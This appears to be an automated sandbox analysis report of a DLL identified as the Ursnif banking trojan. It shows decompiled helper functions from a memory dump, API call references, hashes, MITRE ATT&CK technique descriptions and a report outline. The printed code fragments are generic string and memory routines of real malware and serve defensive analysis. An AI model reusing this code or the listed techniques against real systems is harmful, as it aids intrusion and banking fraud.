Instruction Fuzzy Hash: 52B0129125C102EC3208B1085C07D3B014CC0C0F10335F02BF98CF51D1F4408D000333

Uniqueness

Uniqueness Score: -1.00%

Function 00E8792E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E8792E() {

				E00E87A76(0xe89304, 0xe8a0bc);
				goto __eax;
			}

0x00e87940
0x00e87947

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E87940

Part of subcall function 00E87A76: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E87AEF

Strings

.y, xrefs: 00E8792E
Sy, xrefs: 00E8793A

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID: .y$Sy
API String ID: 123106877-2671831240
Opcode ID: 90cf8384651dc81ad70fc4d75700d3415cb3d5c82da71e46840731be329f3ccc
Instruction ID: 5ac7efd6b90bd273ba3f679e680c3dd5ae29d7dbf54255e91f7d2ba6a40f2f1e
Opcode Fuzzy Hash: 90cf8384651dc81ad70fc4d75700d3415cb3d5c82da71e46840731be329f3ccc
Instruction Fuzzy Hash: CCB0929129D101FC320871041A06C3A010CC0D0B11335B42AF88CF4091A48089010333

Uniqueness

Uniqueness Score: -1.00%

Function 00E83D98, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E83D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00E86837(_t2);
				if(_t34 != 0) {
					_t30 = E00E86837(_t28);
					if(_t30 == 0) {
						E00E850CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00E877DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00E877DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00e83d98
0x00e83da2
0x00e83da4
0x00e83daa
0x00e83daa
0x00e83db3
0x00e83db7
0x00e83dc3
0x00e83dc7
0x00e83e3b
0x00e83dc9
0x00e83dc9
0x00e83dcd
0x00e83dd4
0x00e83dd7
0x00e83df1
0x00e83de0
0x00e83de0
0x00e83de4
0x00e83de7
0x00e83dec
0x00e83dec
0x00e83df6
0x00e83e1e
0x00e83e24
0x00e83e27
0x00e83df8
0x00e83dfa
0x00e83e02
0x00e83e0d
0x00e83e12
0x00e83e12
0x00e83e2e
0x00e83e35
0x00e83e36
0x00e83e36
0x00e83dc7
0x00e83e46

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00E83CEE,00000000,00000000,00000000,05499698,?,?,00E8106E,?,05499698), ref: 00E83DA4

Part of subcall function 00E86837: RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

Part of subcall function 00E877DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00E83DD2,00000000,00000001,00000001,?,?,00E83CEE,00000000,00000000,00000000,05499698), ref: 00E877EB
Part of subcall function 00E877DD: StrChrA.SHLWAPI(?,0000003F,?,?,00E83CEE,00000000,00000000,00000000,05499698,?,?,00E8106E,?,05499698,0000EA60,?), ref: 00E877F5

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00E83CEE,00000000,00000000,00000000,05499698,?,?,00E8106E), ref: 00E83E02
lstrcpy.KERNEL32(00000000,00000000), ref: 00E83E12
lstrcpy.KERNEL32(00000000,00000000), ref: 00E83E1E

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 7ad7644afd6ea79259b80a9292ff01fe734375ca84874b6beb7bfa33856fe085
Instruction ID: 6f509637387844242167bc15329d1649e80064e56062e00e9d876c77c29f724f
Opcode Fuzzy Hash: 7ad7644afd6ea79259b80a9292ff01fe734375ca84874b6beb7bfa33856fe085
Instruction Fuzzy Hash: 7C219072504355AFCB127F75C885AABBFF89F05748B145055F80DBB212D731DA01D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E85D37, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E85D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00E86837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00e85d4c
0x00e85d50
0x00e85d5a
0x00e85d61
0x00e85d64
0x00e85d66
0x00e85d6e
0x00e85d73
0x00e85d81
0x00e85d86
0x00e85d90

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,054992FC,?,00E81B37,004F0053,054992FC,?,?,?,?,?,?,00E820B0), ref: 00E85D47
lstrlenW.KERNEL32(00E81B37,?,00E81B37,004F0053,054992FC,?,?,?,?,?,?,00E820B0), ref: 00E85D4E

Part of subcall function 00E86837: RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,00E81B37,004F0053,054992FC,?,?,?,?,?,?,00E820B0), ref: 00E85D6E
memcpy.NTDLL(74B069A0,00E81B37,00000002,00000000,004F0053,74B069A0,?,?,00E81B37,004F0053,054992FC), ref: 00E85D81

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 91063b5fe1c0ea8842647bb287a4f4e172f2148522d87b76d7490733b896d515
Instruction ID: 3b13d1bfd9891246f9ac0018e80a7b925523c0119c4843864cb373d6d29e7859
Opcode Fuzzy Hash: 91063b5fe1c0ea8842647bb287a4f4e172f2148522d87b76d7490733b896d515
Instruction Fuzzy Hash: 04F0E776900118BBCF11EBA9CC85C9A7BACEF493947154466BA0CE7212E635EA149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E821C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(054987FA,00000000,00000000,00000000,00E87100,00000000), ref: 00E821D1
lstrlen.KERNEL32(?), ref: 00E821D9

Part of subcall function 00E86837: RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

lstrcpy.KERNEL32(00000000,054987FA), ref: 00E821ED
lstrcat.KERNEL32(00000000,?), ref: 00E821F8

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: c9e8ae155af6e1ab381047632349ab325cdd5183dbc830306d49678a3a6164e8
Instruction ID: b495b10e822c297cc9f6dc95fc63b70e8e0934dfcc1414627be84b21a7253d57
Opcode Fuzzy Hash: c9e8ae155af6e1ab381047632349ab325cdd5183dbc830306d49678a3a6164e8
Instruction Fuzzy Hash: 15E01273901225AF87116BE59C48CAFBBADEF89755308041AFB0CF3121C724D809DBA5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 3b17.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Function 6E191144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 6E191B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6E191E8A, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 6E191F7C, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6E191EC7, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 6E191C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 6E191060, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6E191DAE, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 6E1913D1, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 6E1918AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Function 6E1920CE, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 6E19126D, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 6E1914E8, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Function 6E191ADB, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Function 6E191444, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON